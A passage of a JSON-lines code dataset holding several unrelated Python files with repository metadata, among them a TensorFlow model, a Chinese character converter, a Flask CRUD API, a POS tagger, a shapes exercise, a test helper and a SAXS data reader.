self.name,\n            \"private\": self.private,\n            \"pull_requests\": [asdict(pr) for pr in pull_requests]\n        }\n\n\nclass AbstractGitConnector(ABC):\n    \"\"\"\n    This 
class represents an abstract git connector.\n All concrete connectors should be inherited from this.\n \"\"\"\n\n def __init__(\n self,\n username: Optional[str] = None,\n token: Optional[str] = None\n ):\n self.username = username\n self.token = token\n\n @abstractmethod\n def get_repos(self) -> List[AbstractGitRepo]:\n \"\"\"\n Fetch all repositories for this git connection.\n \"\"\"\n\n raise NotImplementedError()\n","repo_name":"markmzhachikh/git-etl-assignment","sub_path":"dependencies/git_connectors/abstract_git_connector.py","file_name":"abstract_git_connector.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21207943082","text":"# the training steps are commented out since it requires quite a lot of GPU memory!!\n\nimport tensorflow as tf\nimport tensorflow.keras\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport data_vectorizer\n# import data_vectorizer_tf\n\nclass Model(tf.keras.Model):\n def __init__(self, zero_to_one_ratio, training_initial_sample_size=1000, steps_per_epoch=50):\n super(Model, self).__init__()\n\n self.zero_to_one_ratio = zero_to_one_ratio\n self.training_initial_sample_size = training_initial_sample_size\n self.steps_per_epoch = steps_per_epoch\n\n # define layers here, input is (batch_size, string_sequence_length)\n # initial embedding layers. in below, we evaluate this with ragged tensors input (on second axis (1))\n word_dict_size = len(data_vectorizer.word_freqs_filtered)\n self.content_title_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n self.content_description_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n self.topic_title_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n self.topic_description_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n\n # concatenation layer\n self.concat_layer = tf.keras.layers.Concatenate(axis=1)\n\n # standard stuff\n self.relu1 = tf.keras.layers.Activation('relu')\n self.dense1 = tf.keras.layers.Dense(units=30, activation=\"relu\")\n self.dense2 = tf.keras.layers.Dense(units=30, activation=\"relu\")\n self.dense3 = tf.keras.layers.Dense(units=1, activation=\"sigmoid\")\n\n # loss functions and eval metrics\n self.accuracy = tf.keras.metrics.BinaryAccuracy(name=\"accuracy\")\n self.precision = tf.keras.metrics.Precision(name=\"precision\")\n self.recall = tf.keras.metrics.Recall(name=\"recall\")\n self.entropy = tf.keras.metrics.BinaryCrossentropy(name=\"entropy\")\n\n # metrics for test set\n self.full_accuracy = tf.keras.metrics.BinaryAccuracy(name=\"full_accuracy\", threshold=0.7)\n self.full_precision = tf.keras.metrics.Precision(name=\"full_precision\", thresholds=0.7)\n self.full_recall = tf.keras.metrics.Recall(name=\"full_recall\", thresholds=0.7)\n self.test_precision = tf.keras.metrics.Precision(name=\"test_precision\", thresholds=0.7)\n self.test_recall = tf.keras.metrics.Recall(name=\"test_recall\", thresholds=0.7)\n\n self.num_step = 0\n\n def compile(self):\n super(Model, self).compile(run_eagerly=True)\n # loss and optimizer\n self.loss = tf.keras.losses.BinaryCrossentropy()\n self.optimizer = tf.keras.optimizers.Adam(learning_rate=0.00025)\n\n def call(self, mdata):\n content_title, content_description, topic_title, topic_description = mdata\n t1 = tf.math.reduce_sum(self.content_title_embedding(content_title), axis=1)\n t2 = tf.math.reduce_sum(self.content_description_embedding(content_description), axis=1)\n t3 = 
tf.math.reduce_sum(self.topic_title_embedding(topic_title), axis=1)\n t4 = tf.math.reduce_sum(self.topic_description_embedding(topic_description), axis=1)\n\n embedding_result = self.concat_layer([t1, t2, t3, t4])\n return self.dense3(self.dense2(self.dense1(self.relu1(embedding_result))))\n\n \"\"\"def obtain_tensor_values(self, initial_sample_size=1000, zero_to_one_ratio=None):\n contents_list, topics_list, correlations = data_vectorizer.random_train_batch_sample(\n initial_sample_size=initial_sample_size, zero_to_one_ratio=zero_to_one_ratio)\n\n contents_strings = data_vectorizer.obtain_contents_vector(list(contents_list))\n topics_strings = data_vectorizer.obtain_topics_vector(list(topics_list))\n\n content_title = tf.ragged.constant(list(contents_strings[\"title_translate\"]))\n content_description = tf.ragged.constant(list(contents_strings[\"description_translate\"]))\n topic_title = tf.ragged.constant(list(topics_strings[\"title_translate\"]))\n topic_description = tf.ragged.constant(list(topics_strings[\"description_translate\"]))\n\n y = tf.constant(correlations)\n\n return content_title, content_description, topic_title, topic_description, y\n\n def obtain_tensor_values2(self, initial_sample_size=1000, zero_to_one_ratio=None):\n contents_list, topics_list, correlations = data_vectorizer_tf.random_train_batch_sample(\n initial_sample_size=initial_sample_size, zero_to_one_ratio=zero_to_one_ratio)\n\n contents_strings = data_vectorizer_tf.obtain_train_contents_vector(contents_list)\n topics_strings = data_vectorizer_tf.obtain_train_topics_vector(topics_list)\n\n content_title, content_description = contents_strings\n topic_title, topic_description = topics_strings\n\n y = tf.constant(correlations)\n\n return content_title, content_description, topic_title, topic_description, y\n\n def obtain_test_values(self, initial_sample_size=1000, zero_to_one_ratio=None):\n contents_list, topics_list, correlations = data_vectorizer_tf.random_test_batch_sample(\n initial_sample_size=initial_sample_size, zero_to_one_ratio=zero_to_one_ratio)\n\n contents_strings = data_vectorizer_tf.obtain_train_contents_vector(contents_list)\n topics_strings = data_vectorizer_tf.obtain_train_topics_vector(topics_list)\n\n content_title, content_description = contents_strings\n topic_title, topic_description = topics_strings\n\n y = tf.constant(correlations)\n\n return content_title, content_description, topic_title, topic_description, y\n\n def train_step(self, data):\n # feedforward + backpropragation with training set\n if self.zero_to_one_ratio < 100:\n content_title, content_description, topic_title, topic_description, y = self.obtain_tensor_values(\n self.training_initial_sample_size, self.zero_to_one_ratio)\n else:\n content_title, content_description, topic_title, topic_description, y = self.obtain_tensor_values2(\n self.training_initial_sample_size, self.zero_to_one_ratio)\n\n with tf.GradientTape() as tape:\n y_pred = self((content_title, content_description, topic_title, topic_description))\n loss = self.loss(y, y_pred)\n\n trainable_vars = self.trainable_weights\n gradients = tape.gradient(loss, trainable_vars)\n\n self.optimizer.apply_gradients(zip(gradients, trainable_vars))\n\n for m in self.metrics:\n m.update_state(y, y_pred)\n\n # feedforward with test set for metrics\n if self.num_step % self.steps_per_epoch == 0:\n content_title, content_description, topic_title, topic_description, y = self.obtain_tensor_values2(600)\n\n y_pred = self((content_title, content_description, topic_title, 
topic_description))\n\n            for m in self.test_metrics:\n                m.update_state(y, y_pred)\n        self.num_step += 1\n        # Return a dict mapping metric names to current value\n        return {**{m.name: m.result() for m in self.metrics}, **{m.name: m.result() for m in self.full_metrics},\n                **{m.name: m.result() for m in self.test_metrics}}\"\"\"\n\n    @property\n    def metrics(self):\n        return [self.accuracy, self.precision, self.recall, self.entropy]\n\n    @property\n    def test_metrics(self):\n        return [self.test_precision, self.test_recall]\n\n    @property\n    def full_metrics(self):\n        return [self.full_accuracy, self.full_precision, self.full_recall]","repo_name":"louis845/KaggleLearningEquality2023","sub_path":"model_vectorizer_simple.py","file_name":"model_vectorizer_simple.py","file_ext":"py","file_size_in_byte":7837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"21395551660","text":"# -*- coding: utf-8 -*-\n\n# maximal (longest-first) match\ndef conv(string,dic):\n    i = 0\n    while i < len(string):\n        for j in range(len(string) - i, 0, -1):\n            if string[i:][:j] in dic:\n                t = dic[string[i:][:j]]\n                string = string[:i] + t + string[i:][j:]\n                i += len(t) - 1\n                break\n        i += 1\n    return string\n    \n# generate dict\ndef mdic(): \n    table = open('ZhConversion.php','r').readlines()\n    dic = dict()\n    name = []\n    for line in table:\n        if line[0] == '$':\n            #print line.split()[0][1:]\n            name.append(dic)\n            dic = dict()\n        if line[0] == \"'\":\n            word = line.split(\"'\")\n            dic[word[1]] = word[3]\n    name[3].update(name[1]) # SC to TC: zh2Hant + zh2TW\n    name[4].update(name[1]) # SC to TC: zh2Hant + zh2HK\n    name[5].update(name[2]) # TC to SC: zh2Hans + zh2CN\n    return name[3],name[4],name[5]\n    \n\ndef main():\n    resultfile = open('ExtractedSimplifiedChineseCharacters.txt','w')  # was 'wa', which is not a valid open() mode\n    with open('TabDilimitedCSV.csv','r') as f:\n        for line in f:\n            simplifiedstr = line.split('\\t')[4] #change this index to the one corresponding to CSV columns\n            resultfile.write(conv(simplifiedstr,dic_CN)+'\\n')\n    resultfile.close()  # was: newf.close (undefined name, and the method was never actually called)\n\nif __name__==\"__main__\":\n\n    [dic_TW,dic_HK,dic_CN] = mdic()\n    main()\n","repo_name":"LS2002/cn-character-converter","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12904483361","text":"import datetime\nimport json\n\nfrom flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import *\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///data/database.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config[\"JSON_AS_ASCII\"] = False\napp.config[\"JSON_SORT_KEYS\"] = False\n\ndb = SQLAlchemy(app)\n\n\n@app.route(\"/users\", methods=[\"GET\", \"POST\"])\ndef users():\n    if request.method == \"GET\":\n        user_data = db.session.query(User).all()\n        return jsonify([user.to_dict() for user in user_data])\n    elif request.method == \"POST\":\n        try:\n            user = json.loads(request.data)\n            new_user_obj = User(\n                id=user[\"id\"],\n                first_name=user[\"first_name\"],\n                last_name=user[\"last_name\"],\n                age=user[\"age\"],\n                email=user[\"email\"],\n                role=user[\"role\"],\n                phone=user[\"phone\"]\n            )\n            with db.session.begin():\n                
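# [Editor's aside] A hedged demo of the maximal-match conv() above with a toy
# mapping (not the real ZhConversion tables): the longest key wins at each position.
toy = {'ab': 'X', 'a': 'Y', 'b': 'Z'}
print(conv('aba', toy))  # -> 'XY': 'ab' is consumed first, then the trailing 'a'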
db.session.add(new_user_obj)\n return \"Пользователь создан в базе данных\", 200\n except Exception as e:\n print(e)\n\n\n@app.route(\"/users/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef user_one(user_id):\n if request.method == \"GET\":\n user_data = db.session.query(User).get(user_id)\n if user_data is None:\n return \"Не найдено\"\n else:\n return jsonify(user_data.to_dict())\n elif request.method == \"PUT\":\n with db.session.begin():\n user_data = json.loads(request.data)\n user = db.session.query(User).get(user_id)\n if user is None:\n return \"Пользователь не найден!\", 404\n user.first_name = user_data[\"first_name\"]\n user.last_name = user_data[\"last_name\"]\n user.age = user_data[\"age\"]\n user.email = user_data[\"email\"]\n user.role = user_data[\"role\"]\n user.phone = user_data[\"phone\"]\n\n db.session.add(user)\n return f\"Пользователь с id {user_id} успешно изменён!\", 200\n elif request.method == \"DELETE\":\n with db.session.begin():\n user = db.session.query(User).get(user_id)\n if user is None:\n return \"Пользователь не найден!\", 404\n\n db.session.delete(user)\n return f\"Пользователь с id {user_id} успешно удалён!\", 200\n\n\n@app.route(\"/orders\", methods=[\"GET\", \"POST\"])\ndef orders():\n if request.method == \"GET\":\n order_data = db.session.query(Order).all()\n return jsonify([order.to_dict() for order in order_data])\n elif request.method == \"POST\":\n try:\n order = json.loads(request.data)\n month_start, day_start, year_start = [int(_) for _ in order['start_date'].split(\"/\")]\n month_end, day_end, year_end = [int(_) for _ in order['end_date'].split(\"/\")]\n new_order_obj = Order(\n id=order[\"id\"],\n name=order[\"name\"],\n description=order[\"description\"],\n start_date=datetime.date(month=month_start, day=day_start, year=year_start),\n end_date=datetime.date(month=month_end, day=day_end, year=year_end),\n address=order[\"address\"],\n price=order[\"price\"],\n customer_id=order[\"customer_id\"],\n executor_id=order[\"executor_id\"]\n )\n with db.session.begin():\n db.session.add(new_order_obj)\n return \"Заказ создан в базе данных\", 200\n except Exception as e:\n print(e)\n\n\n@app.route(\"/orders/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef order_one(order_id):\n if request.method == \"GET\":\n order_data = db.session.query(Order).get(order_id)\n if order_data is None:\n return \"Не найдено\"\n else:\n return jsonify(order_data.to_dict())\n elif request.method == \"PUT\":\n with db.session.begin():\n order_data = json.loads(request.data)\n order = db.session.query(Order).get(order_id)\n month_start, day_start, year_start = [int(_) for _ in order_data['start_date'].split(\"/\")]\n month_end, day_end, year_end = [int(_) for _ in order_data['end_date'].split(\"/\")]\n if order is None:\n return \"Заказ не найден!\", 404\n order.name = order_data[\"name\"]\n order.description = order_data[\"description\"]\n order.start_date = datetime.date(month=month_start, day=day_start, year=year_start)\n order.end_date = datetime.date(month=month_end, day=day_end, year=year_end)\n order.address = order_data[\"address\"]\n order.price = order_data[\"price\"]\n order.customer_id = order_data[\"customer_id\"]\n order.executor_id = order_data[\"executor_id\"]\n\n db.session.add(order)\n return f\"Заказ с id {order_id} успешно изменён!\", 200\n elif request.method == \"DELETE\":\n with db.session.begin():\n order = db.session.query(Order).get(order_id)\n if order is None:\n return \"Заказ не найден!\", 404\n\n db.session.delete(order)\n return f\"Заказ с 
id {order_id} успешно удалён!\", 200\n\n\n@app.route(\"/offers\", methods=[\"GET\", \"POST\"])\ndef offers():\n if request.method == \"GET\":\n offer_data = db.session.query(Offer).all()\n return jsonify([offer.to_dict() for offer in offer_data])\n elif request.method == \"POST\":\n try:\n offer = json.loads(request.data)\n new_offer_obj = Offer(\n id=offer[\"id\"],\n order_id=offer[\"order_id\"],\n executor_id=offer[\"executor_id\"]\n )\n with db.session.begin():\n db.session.add(new_offer_obj)\n return \"Предложение создано в базе данных\", 200\n except Exception as e:\n print(e)\n\n\n@app.route(\"/offers/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef offer_one(offer_id):\n if request.method == \"GET\":\n offer_data = db.session.query(Offer).get(offer_id)\n if offer_data is None:\n return \"Не найдено\"\n else:\n return jsonify(offer_data.to_dict())\n elif request.method == \"PUT\":\n with db.session.begin():\n offer_data = json.loads(request.data)\n offer = db.session.query(Offer).get(offer_id)\n if offer is None:\n return \"Предложение не найдено!\", 404\n offer.order_id = offer_data[\"order_id\"]\n offer.executor_id = offer_data[\"executor_id\"]\n\n db.session.add(offer)\n return f\"Предложение с id {offer_id} успешно изменёно!\", 200\n elif request.method == \"DELETE\":\n with db.session.begin():\n offer = db.session.query(Offer).get(offer_id)\n if offer is None:\n return \"Предложение не найдено!\", 404\n\n db.session.delete(offer)\n return f\"Предложение с id {offer_id} успешно удалёно!\", 200\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Grislii/HW16","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18943729727","text":"from collections import defaultdict, Counter\n\n\nclass BaselineTagger:\n\n def __init__(self, tagged_sents):\n \"\"\"\n tagged_sents -- training sentences, each one being a list of pairs.\n \"\"\"\n self.voc = set()\n self.set_of_tags = set()\n self.tag_freq = Counter()\n self.most_freq_tag_by_word = defaultdict(str)\n tagsby_word = defaultdict(lambda: Counter())\n\n for sent in tagged_sents:\n for word, tag in sent:\n self.voc.add(word)\n self.set_of_tags.add(tag)\n self.tag_freq[tag] += 1\n tagsby_word[word][tag] += 1\n\n for w, tag_dict in tagsby_word.items():\n self.most_freq_tag_by_word[w] = tag_dict.most_common(1)[0][0]\n\n self.most_freq_tag = self.tag_freq.most_common(1)[0][0]\n\n def tagset(self):\n \"\"\"Returns the set of tags.\n \"\"\"\n return self.set_of_tags\n\n def unknown(self, w):\n \"\"\"Check if a word is unknown for the model.\n\n w -- the word.\n \"\"\"\n return w not in self.voc\n\n def tag_word(self, w):\n \"\"\"Tag a word.\n\n w -- the word.\n \"\"\"\n tag = None\n\n if self.unknown(w):\n tag = self.most_freq_tag\n else:\n tag = self.most_freq_tag_by_word[w]\n\n return tag\n\n def tag(self, sent):\n \"\"\"Tag a sentence.\n\n sent -- the sentence.\n \"\"\"\n tagging = [self.tag_word(w) for w in sent]\n return tagging\n","repo_name":"acapello/PLN-2015","sub_path":"tagging/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"27067266106","text":"#!/usr/bin/python3\n\"\"\"\n2.1 Shapes\n\nBuild a class hierarchy for a primitive graphic editor figures data model.\nTwo basic entities of a graphic editor are a Color and a Coordinates which are building 
blocks for all other entities.\nCoordinates can be defined in several ways (Linear, Cyllindric, Spheric) through static methods.\nA conversion logic between them is out of scope for this task,\nfor simplicity just store a coordinates type in a field.\n\nThere are several basic shapes:\na Point, a Line, a Circle, a Rectangle, and a Triangle - each defined by a different combination of\nColor and Coordinates. A line can have a Pattern consisting of a list of (Color, length) tuples;\nmore complex shapes can be filled with a Color or not (be transparent) and each their border can still have a Pattern.\n\nWithin a course of this task no other methods than are necessary to create objects are required.\n\"\"\"\n\n\nclass Color(object):\n pass\n\navailable_types = [\"Linear\", \"Cyllindric\", \"Spheric\"]\n\n\nclass Coordinate(object):\n type = \"Linear\"\n\n @staticmethod\n def set_coordinate(input_type):\n if input_type in available_types:\n Coordinate.type = input_type\n\n\nclass Point(object):\n\n def __init__(self, color, center):\n self.color = color\n self.center = center\n\n\nclass Line(object):\n\n def __init__(self, color, start, end):\n self.color = color\n self.start = start\n self.end = end\n\n\nclass Circle(Point):\n\n def __init__(self, color, center, radius):\n super().__init__(color, center)\n self.radius = radius\n\n\nclass Rectangle(object):\n\n def __init__(self, top, bottom, left, right):\n self.top = top\n self.bottom = bottom\n self.left = left\n self.right = right\n\n\nclass Triangle(object):\n\n def __init__(self, first, second, third):\n self.first = first\n self.second = second\n self.third = third\n\n","repo_name":"mstepovanyy/python-training","sub_path":"course/lesson10/task01/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20429481201","text":"import inspect\nimport re\nimport unittest\nimport unittest.case as case\nfrom functools import wraps, partial\n\n# TODO use the logger object\n# TODO tell the Helpers to increase the exit status in case of failure\n# (through the logger) ?\n\n_print = partial(print, flush=True)\n\n\ndef addSuccess(method):\n \"\"\"Decorator to wrap TestCase methods by calling writeResult\"\"\"\n\n @wraps(method)\n def wrapper(inst, *args, **kwds):\n \"\"\"wrapper\"\"\"\n # move 'msg' arguments from args to kwds if it exists\n sig = inspect.signature(method)\n args = list(args)\n for i, para in enumerate(sig.parameters):\n if i >= len(args):\n break\n if para == \"msg\":\n kwds[\"msg\"] = args.pop(i)\n try:\n ret = method(inst, *args, **kwds)\n except AssertionError as exc:\n ret = None\n inst.writeResult(False, method.__name__, kwds.get(\"msg\"), str(exc))\n else:\n inst.writeResult(True, method.__name__, kwds.get(\"msg\"))\n return ret\n\n return wrapper\n\n\ndef where(level=3):\n \"\"\"Return the filename/line number where the test is called.\n\n Arguments:\n level (Optional[int]): Number of frames to rewind to find the\n caller. 
Defaults to 3 (1: *here*, 2: *write_xxx*, 3: *assertXxx*).\n\n Returns:\n (str, int): Filename and line number.\n \"\"\"\n filename, line_no = \"not_found\", 0\n caller = inspect.currentframe()\n try:\n for _ in range(level):\n if not caller.f_back:\n break\n caller = caller.f_back\n filename = caller.f_code.co_filename\n line_no = caller.f_lineno\n finally:\n pass\n return f\"{filename}#{line_no}\"\n\n\nclass AssertRaisesContext(case._AssertRaisesContext):\n \"\"\"Wrap Context of TestCase object\"\"\"\n\n def __init__(self, expected, test_case, expected_regexp=None):\n self.writeResult = test_case.writeResult\n # these two lines already exist in __exit__ in python >= 2.7.9\n if isinstance(expected_regexp, str):\n expected_regexp = re.compile(expected_regexp)\n super().__init__(expected, test_case, expected_regexp)\n\n def __exit__(self, exc_type, exc_value, tb):\n comment = \"\"\n try:\n ret = super().__exit__(exc_type, exc_value, tb)\n if not ret:\n try:\n exc_name = exc_type.__name__\n except AttributeError:\n exc_name = str(exc_type)\n raise AssertionError(\"unexpected exception raised: \" \"{0}\".format(exc_name))\n except AssertionError as exc:\n ret = False\n comment = str(exc)\n self.writeResult(ret, self.expected.__name__, comment)\n # never fail\n return True\n\n\nclass TestCase(unittest.TestCase):\n \"\"\"Similar to a unittest.TestCase\n Does not fail but print result OK/NOOK in the .resu file\"\"\"\n\n def __init__(self, methodName=\"runTest\", silent=False):\n \"\"\"Initialization\"\"\"\n self._silent = silent\n self._passed = 0\n self._failure = 0\n self._last_ok = True\n super().__init__(\"runTest\")\n\n @property\n def last_failed(self):\n \"\"\"bool: Tell if the last test failed.\"\"\"\n return not self._last_ok\n\n def runTest(self):\n \"\"\"does nothing\"\"\"\n pass\n\n def printSummary(self):\n \"\"\"Print a summary of the tests\"\"\"\n _print((\"-\" * 70))\n count = self._passed + self._failure\n _print(\n (\"Ran {0} tests, {1} passed, {2} in failure\".format(count, self._passed, self._failure))\n )\n if self._failure:\n _print(\"\\nNOOK\\n\")\n else:\n _print(\"\\n OK \\n\")\n\n def writeResult(self, ok, funcTest, msg, exc=None):\n \"\"\"Write a message in the result file\"\"\"\n if self._silent:\n return\n exc = exc or \"\"\n msg = msg or \"\"\n s1 = \" : \" if exc else \"\"\n s2 = \" : \" if msg else \"\"\n here = where()\n self._last_ok = ok\n if ok:\n self._passed += 1\n fmt = \" OK {func:>16} passed{s2}{msg}\"\n else:\n self._failure += 1\n fmt = \"NOOK {func:>16} failed{s1}{exc} - {here}\"\n _print(fmt.format(func=funcTest, msg=msg, exc=exc, s1=s1, s2=s2, here=here))\n\n # just use a derivated context class\n def assertRaises(self, excClass, callableObj=None, *args, **kwargs):\n \"\"\"Fail unless an exception of class excClass is raised\"\"\"\n context = AssertRaisesContext(excClass, self)\n if callableObj is None:\n return context\n with context:\n callableObj(*args, **kwargs)\n\n def assertRaisesRegex(\n self, expected_exception, expected_regexp, callable_obj=None, *args, **kwargs\n ):\n \"\"\"Asserts that the message in a raised exception matches a regexp.\"\"\"\n context = AssertRaisesContext(expected_exception, self, expected_regexp)\n if callable_obj is None:\n return context\n with context:\n callable_obj(*args, **kwargs)\n\n\ndef _add_assert_methods(cls):\n for meth in [\n \"assertAlmostEqual\",\n \"assertCountEqual\",\n \"assertDictContainsSubset\",\n \"assertDictEqual\",\n \"assertEqual\",\n \"assertFalse\",\n \"assertGreater\",\n 
\"assertGreaterEqual\",\n \"assertIn\",\n \"assertIs\",\n \"assertIsInstance\",\n \"assertIsNone\",\n \"assertIsNot\",\n \"assertIsNotNone\",\n \"assertLess\",\n \"assertLessEqual\",\n \"assertMultiLineEqual\",\n \"assertNotAlmostEqual\",\n \"assertNotEqual\",\n \"assertNotIn\",\n \"assertNotIsInstance\",\n \"assertNotRegex\",\n \"assertRegex\",\n \"assertSequenceEqual\",\n \"assertSetEqual\",\n \"assertTrue\",\n \"assertTupleEqual\",\n ]:\n setattr(cls, meth, addSuccess(getattr(unittest.TestCase, meth)))\n\n\n_add_assert_methods(TestCase)\ndel _add_assert_methods\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/Utilities/Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12136533993","text":"import os\nimport glob\nimport numpy\nimport locale\nimport string\n\nDEBUG = True\n\nif DEBUG:\n pass\n# debug_number_of_files = 100\n# debug_number_of_files = 500\n# debug_number_of_files = 10000\n\n#TODO: need to make sure API on file reading is followed exactly\n#TODO: need to have a policy for lines in data file that should be okay to skip\n#TODO: need to look at UTF-8 encoding \n#TODO: need to handle new-line / carriage return \n#TODO: need example MSDOS/WINDOWS file example as a test case\n\n#TODO: all the above should be captured in an API ; perhaps sassie-wide file reader with options\n\n#TODO: these same file reading & testing methods should be used by the filter for this module\n\ndef validate_data(other_self):\n\n mvars = other_self.mvars\n evars = other_self.evars\n log = other_self.log\n pgui = other_self.run_utils.print_gui \n\n if DEBUG:\n pgui('in validate_data')\n\n log.debug('q_data = ' + numpy.array2string(evars.q_data))\n log.debug('goal_q_data = ' + numpy.array2string(evars.goal_q_data))\n log.debug('goal_iq_data = ' + numpy.array2string(evars.goal_iq_data))\n log.debug('goal_iq_error_data = ' + numpy.array2string(evars.goal_iq_error_data))\n\n #TODO: use something like this to create an error: q_data[0] = 3.3333\n #TODO: all of this should be handled in filter\n\n #check that q-arrays of theoretical and experimental data are identical\n\n if evars.q_data.all() != evars.goal_q_data.all():\n pgui(\"q-values in theoretical files do not agree with those in experimental data file\")\n\n #check lengths of theoretical arrays: number of frames\n \n #TODO: not tested for failure\n if evars.iq_data.shape != evars.iq_error_data.shape:\n pgui(\"number of theoretical iq values does not match theoretical iq error values\")\n\n # check that the number of data points match\n \n #TODO: not tested for failure\n if evars.iq_data.shape[1] != evars.goal_q_data.shape[0]:\n pgui(\"number of theoretical iq values does not match the number of experimental q-values\")\n pgui(\"evars.iq_data.shape[1] = \"+str(evars.iq_data.shape[1]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n #TODO: not tested for failure\n if evars.iq_error_data.shape[1] != evars.goal_q_data.shape[0]:\n pgui(\"number of theoretical iq error values does not match the number of experimental q-values\")\n pgui(\"evars.iq_error_data.shape[1] = \"+str(evars.iq_error_data.shape[1]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n #TODO: not tested for failure\n if evars.goal_iq_data.shape[0] != evars.goal_q_data.shape[0]:\n pgui(\"number of experimental iq values does not match the number of experimental q-values\")\n 
pgui(\"evars.goal_iq_data.shape[0] = \"+str(evars.goal_iq_data.shape[0]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n #TODO: not tested for failure\n if evars.goal_iq_error_data.shape[0] != evars.goal_q_data.shape[0]:\n pgui(\"number of experimental iq error values does not match the number of experimental q-values\")\n pgui(\"evars.goal_iq_error_data.shape[0] = \"+str(evars.goal_iq_error_data.shape[0]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n\n return\n\ndef read_goal_iq_data(other_self):\n\n mvars = other_self.mvars\n evars = other_self.evars\n log = other_self.log\n pgui = other_self.run_utils.print_gui \n\n this_q = []\n this_iq = []\n this_iq_error = []\n with open(mvars.goal_iq_data_file) as this_file:\n for line in this_file: \n my_line = string.split(line)\n this_q.append(locale.atof(my_line[0]))\n this_iq.append(locale.atof(my_line[1]))\n this_iq_error.append(locale.atof(my_line[2]))\n\n this_q = numpy.array(this_q, numpy.float)\n this_iq = numpy.array(this_iq, numpy.float)\n this_iq_error = numpy.array(this_iq_error, numpy.float)\n\n evars.goal_q_data = this_q\n evars.goal_iq_data = this_iq\n evars.goal_iq_error_data = this_iq_error\n\n return \n\ndef read_iq_data(other_self):\n mvars = other_self.mvars\n evars = other_self.evars\n log = other_self.log\n pgui = other_self.run_utils.print_gui \n\n if DEBUG:\n pgui(\"DEBUG MODE\")\n pgui(\"DEBUG MODE\")\n pgui(\"DEBUG MODE\")\n\n first = True\n\n evars.number_iq_files = 0\n\n for name in glob.glob(os.path.join(mvars.iq_data_path, '*.iq')): \n evars.number_iq_files += 1\n pgui('evars.number_iq_files = ' + str(evars.number_iq_files))\n\n if mvars.number_of_files_to_use < evars.number_iq_files:\n log.debug(\"fewer files found than requested number of files by user\")\n evars.number_iq_files = mvars.number_of_files_to_use\n if mvars.number_of_files_to_use > evars.number_iq_files:\n log.error(\"more files requested by user than found\")\n\n count = 0\n\n for name in glob.glob(os.path.join(mvars.iq_data_path, '*.iq')): \n\n this_q = []\n this_iq = []\n this_iq_error = []\n with open(name) as this_file:\n for line in this_file: \n my_line = string.split(line)\n this_q.append(locale.atof(my_line[0]))\n this_iq.append(locale.atof(my_line[1]))\n this_iq_error.append(locale.atof(my_line[2]))\n\n this_q = numpy.array(this_q, numpy.float)\n this_iq = numpy.array(this_iq, numpy.float)\n this_iq_error = numpy.array(this_iq_error, numpy.float)\n \n if first:\n\n if DEBUG:\n debug_number_of_files = mvars.number_of_files_to_use\n q_data = numpy.zeros(len(this_q), numpy.float)\n iq_data = numpy.zeros((debug_number_of_files,len(this_q)), numpy.float)\n iq_data = numpy.zeros((debug_number_of_files,len(this_q)), numpy.float)\n iq_error_data = numpy.zeros((debug_number_of_files,len(this_q)), numpy.float)\n else:\n q_data = numpy.zeros(len(this_q), numpy.float)\n iq_data = numpy.zeros((mvars.number_of_files_to_use, len(this_q)), numpy.float)\n iq_error_data = numpy.zeros((mvars.number_of_files_to_use, len(this_q)), numpy.float)\n\n q_data = this_q\n first = False \n \n iq_data[count,:] = this_iq\n iq_error_data[count,:] = this_iq_error\n\n if count > 0:\n #test if all q-values are identical\n #if(count == 3):\n # this_q[0] = 3.0\n if this_q.all() != last_q.all():\n pgui('q-values do not agree for file: '+name+'\\nSTOPPING PROGRAM\\n')\n log.error('q-values do not agree for file: '+name+'\\nSTOPPING PROGRAM\\n')\n pgui('this_q = ' + str(this_q))\n log.error('this_q = ' + str(this_q))\n 
